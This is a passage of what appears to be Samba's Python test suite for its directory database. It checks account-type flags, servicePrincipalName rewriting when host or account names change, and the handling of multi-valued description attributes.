# "objectclass": "computer",
# "userAccountControl": str(UF_NORMAL_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD)})
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_TEMP_DUPLICATE_ACCOUNT)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_SERVER_TRUST_ACCOUNT)})
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_WORKSTATION_TRUST_ACCOUNT)})
except LdbError, (num, _):
self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# ldb.add({
# "dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
# "objectclass": "computer",
# "userAccountControl": str(UF_INTERDOMAIN_TRUST_ACCOUNT)})
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
# delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# Modify operation
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer"})
# After creation we should have a normal account
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE != 0)
# As computer you can switch from a normal account to a workstation
# or server trust account and back (also swapping between trust
# accounts is allowed).
# The UF_PASSWD_NOTREQD flag is needed since we haven't requested a
# password yet.
# With SYSTEM rights you can switch to an interdomain trust account.
# Invalid attribute
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement("0",
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# This has to wait until s4 supports it (needs a password module change)
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_NORMAL_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# except LdbError, (num, _):
# self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE,
attrs=["sAMAccountType", "userAccountControl"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
self.assertTrue(int(res1[0]["userAccountControl"][0]) & UF_ACCOUNTDISABLE == 0)
try:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_TEMP_DUPLICATE_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OTHER)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_SERVER_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_WORKSTATION_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_NORMAL_ACCOUNT)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_SERVER_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["userAccountControl"] = MessageElement(
str(UF_WORKSTATION_TRUST_ACCOUNT),
FLAG_MOD_REPLACE, "userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_WORKSTATION_TRUST)
# This isn't supported yet in s4 - needs ACL module adaption
# try:
# m = Message()
# m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
# m["userAccountControl"] = MessageElement(
# str(UF_INTERDOMAIN_TRUST_ACCOUNT),
# FLAG_MOD_REPLACE, "userAccountControl")
# ldb.modify(m)
# self.fail()
# except LdbError, (num, _):
# self.assertEquals(num, ERR_INSUFFICIENT_ACCESS_RIGHTS)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
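# For reference, the userAccountControl values combined above are plain
# bit flags; the numeric values below are the ones documented in
# MS-ADTS/MS-SAMR, and the *_SKETCH names are used only to avoid
# shadowing the constants imported by this module:
#
# UF_ACCOUNTDISABLE_SKETCH = 0x0002
# UF_PASSWD_NOTREQD_SKETCH = 0x0020
# UF_NORMAL_ACCOUNT_SKETCH = 0x0200
# UF_WORKSTATION_TRUST_ACCOUNT_SKETCH = 0x1000
# UF_SERVER_TRUST_ACCOUNT_SKETCH = 0x2000
# uac = UF_NORMAL_ACCOUNT_SKETCH | UF_PASSWD_NOTREQD_SKETCH  # == 0x0220
# assert uac & UF_ACCOUNTDISABLE_SKETCH == 0  # i.e. the account is enabled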
def test_service_principal_name_updates(self):
"""Test the servicePrincipalNames update behaviour"""
print "Testing servicePrincipalNames update behaviour\n"
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname.testdom"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"servicePrincipalName": "HOST/testname.testdom"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName"])
self.assertTrue(len(res) == 1)
self.assertFalse("dNSHostName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname2.testdom",
"servicePrincipalName": "HOST/testname.testdom"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["dNSHostName"][0], "testname2.testdom")
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname.testdom")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname.testdoM",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname.testdom")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom2",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement([],
FLAG_MOD_DELETE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname.testdom3",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom2",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname3.testdom3",
FLAG_MOD_REPLACE, "dNSHostName")
m["servicePrincipalName"] = MessageElement("HOST/testname2.testdom2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname3.testdom3")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement("HOST/testname2.testdom2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
m["dNSHostName"] = MessageElement("testname4.testdom4",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2.testdom2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement([],
FLAG_MOD_DELETE,
"servicePrincipalName")
ldb.modify(m)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom2",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"sAMAccountName": "testname$"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"servicePrincipalName": "HOST/testname"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountName"])
self.assertTrue(len(res) == 1)
self.assertTrue("sAMAccountName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"sAMAccountName": "testname$",
"servicePrincipalName": "HOST/testname"})
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["sAMAccountName"][0], "testname$")
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testnamE$",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("test$name$",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/test$name")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname2",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname3",
FLAG_MOD_REPLACE, "sAMAccountName")
m["servicePrincipalName"] = MessageElement("HOST/testname2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname3")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement("HOST/testname2",
FLAG_MOD_REPLACE,
"servicePrincipalName")
m["sAMAccountName"] = MessageElement("testname4",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["servicePrincipalName"][0],
"HOST/testname2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["servicePrincipalName"] = MessageElement([],
FLAG_MOD_DELETE,
"servicePrincipalName")
ldb.modify(m)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname2",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertFalse("servicePrincipalName" in res[0])
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname.testdom",
"sAMAccountName": "testname$",
"servicePrincipalName": [ "HOST/testname.testdom", "HOST/testname" ]
})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["dNSHostName"] = MessageElement("testname2.testdom",
FLAG_MOD_REPLACE, "dNSHostName")
m["sAMAccountName"] = MessageElement("testname2$",
FLAG_MOD_REPLACE, "sAMAccountName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName", "sAMAccountName", "servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["dNSHostName"][0], "testname2.testdom")
self.assertEquals(res[0]["sAMAccountName"][0], "testname2$")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2" or
res[0]["servicePrincipalName"][1] == "HOST/testname2")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2.testdom" or
res[0]["servicePrincipalName"][1] == "HOST/testname2.testdom")
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestcomputer,cn=computers," + self.base_dn,
"objectclass": "computer",
"dNSHostName": "testname.testdom",
"sAMAccountName": "testname$",
"servicePrincipalName": [ "HOST/testname.testdom", "HOST/testname" ]
})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
m["sAMAccountName"] = MessageElement("testname2$",
FLAG_MOD_REPLACE, "sAMAccountName")
m["dNSHostName"] = MessageElement("testname2.testdom",
FLAG_MOD_REPLACE, "dNSHostName")
ldb.modify(m)
res = ldb.search("cn=ldaptestcomputer,cn=computers," + self.base_dn,
scope=SCOPE_BASE, attrs=["dNSHostName", "sAMAccountName", "servicePrincipalName"])
self.assertTrue(len(res) == 1)
self.assertEquals(res[0]["dNSHostName"][0], "testname2.testdom")
self.assertEquals(res[0]["sAMAccountName"][0], "testname2$")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2" or
res[0]["servicePrincipalName"][1] == "HOST/testname2")
self.assertTrue(res[0]["servicePrincipalName"][0] == "HOST/testname2.testdom" or
res[0]["servicePrincipalName"][1] == "HOST/testname2.testdom")
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
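# The dNSHostName/sAMAccountName <-> servicePrincipalName coupling tested
# above can be summarised in a small pure-Python sketch (the function
# name and shape are illustrative only): HOST/ SPNs matching the old name
# are rewritten, matching is case-insensitive, a pure case change is a
# no-op (which is why "testname.testdoM" left the SPN untouched), and an
# explicit servicePrincipalName value in the same modify wins over the
# derived rewrite.
#
# def _rename_host_spns(spns, old_name, new_name):
#     if old_name.lower() == new_name.lower():
#         return spns  # case-only change: SPNs are left alone
#     return ["HOST/" + new_name
#             if spn.lower() == "host/" + old_name.lower() else spn
#             for spn in spns]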
def test_sam_description_attribute(self):
"""Test SAM description attribute"""
print "Test SAM description attribute"""
# Note: a duplicated key in a Python dict literal keeps only the last
# value, so this add sends a single description value: "desc1".
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"description": "desc2",
"objectclass": "group",
"description": "desc1"})
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"description": ["desc1", "desc2"]})
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 2)
self.assertTrue(res[0]["description"][0] == "desc1" or
res[0]["description"][1] == "desc1")
self.assertTrue(res[0]["description"][0] == "desc2" or
res[0]["description"][1] == "desc2")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_REPLACE,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_DELETE,
"description")
ldb.modify(m)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group" })
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_REPLACE,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
self.ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"description": ["desc1", "desc2"]})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_REPLACE,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc3", FLAG_MOD_ADD,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_DELETE,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_ATTRIBUTE)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_DELETE,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertFalse("description" in res[0])
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc1","desc2"], FLAG_MOD_REPLACE,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement(["desc3", "desc4"], FLAG_MOD_ADD,
"description")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["description"] = MessageElement("desc1", FLAG_MOD_ADD,
"description")
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc1")
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m.add(MessageElement("desc1", FLAG_MOD_DELETE, "description"))
m.add(MessageElement("desc2", FLAG_MOD_ADD, "description"))
ldb.modify(m)
res = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["description"])
self.assertTrue(len(res) == 1)
self.assertTrue("description" in res[0])
self.assertTrue(len(res[0]["description"]) == 1)
self.assertEquals(res[0]["description"][0], "desc2")
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
if not "://" in host:
if os.path.isfile(host):
host = "tdb://%s" % host
else:
host = "ldap://%s" % host
ldb = SamDB(host, credentials=creds, session_info=system_session(lp), lp=lp)
runner = SubunitTestRunner()
rc = 0
if not runner.run(unittest.makeSuite(SamTests)).wasSuccessful():
rc = 1
sys.exit(rc)
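# (This script is normally driven by Samba's selftest harness; assuming
# the usual option parsing defined earlier in the file, a standalone run
# would look roughly like
#   python sam.py ldap://<dc-hostname> -U"<username>%<password>"
# with host, creds and lp taken from those command-line options.)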
